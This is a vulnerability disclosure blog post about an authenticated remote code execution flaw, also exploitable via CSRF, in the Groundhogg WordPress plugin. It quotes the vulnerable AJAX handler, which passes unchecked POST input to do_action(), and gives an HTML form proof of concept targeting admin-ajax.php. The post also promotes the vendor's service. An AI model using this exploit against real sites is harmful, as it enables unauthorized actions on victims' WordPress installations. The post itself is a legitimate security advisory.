Our Proactive Monitoring Caught an Authenticated Remote Code Execution (RCE) Vulnerability Being Introduced in to Groundhogg
Occasionally our proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities catches an easy to confirm vulnerability and that was the case with an authenticated remote code execution (RCE) vulnerability being introduced in to the plugin Groundhogg, which is also exploitable through cross-site request forgery (CSRF).
Since our Plugin Security Checker utilizes the same checks, it will alert you if plugins you use possibly contain the same type vulnerable code (and other types of vulnerable code). From there if you are a paying customer of our service you can suggest/vote for it to receive a security review that will check over that or you can order the same type of review separately.
The Plugin Security Checker flags a number of other possible security vulnerabilities in the plugin, so if you use this plugin it would be a good idea to have it further reviewed.
The impacted code isn’t too hard to understand, as it passes the value of POST input “bulk_action” to the function do_action(), which executes “functions hooked on a specific action hook”:
35 36 37 38 39 | public function ajax_listener() { $bulk_action = $_POST[ 'bulk_action' ]; do_action( $bulk_action ); } |
Based on the name of the function it isn’t surprising that it is accessible through WordPress’ AJAX functionality:
29 | add_action( 'wp_ajax_bulk_action_listener', [ $this, 'ajax_listener' ] ); |
In this case it is accessible to anyone logged in to WordPress. Since the code in that function doesn’t check for a valid nonce, in addition to anyone logged in to WordPress being able to exploit it, an attacker could cause someone that is logged in to exploit this without intending to, as well.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since multiple previously full disclosed vulnerabilities were quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.
Proof of Concept
The following proof of concept will cause the WordPress action/function do_feed_rss to run, when logged in to WordPress.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=bulk_action_listener" method="POST"> <input type="hidden" name="bulk_action" value="do_feed_rss" /> <input type="submit" value="Submit" /> </form> </body> </html>
Is It Fixed?
If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information, can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.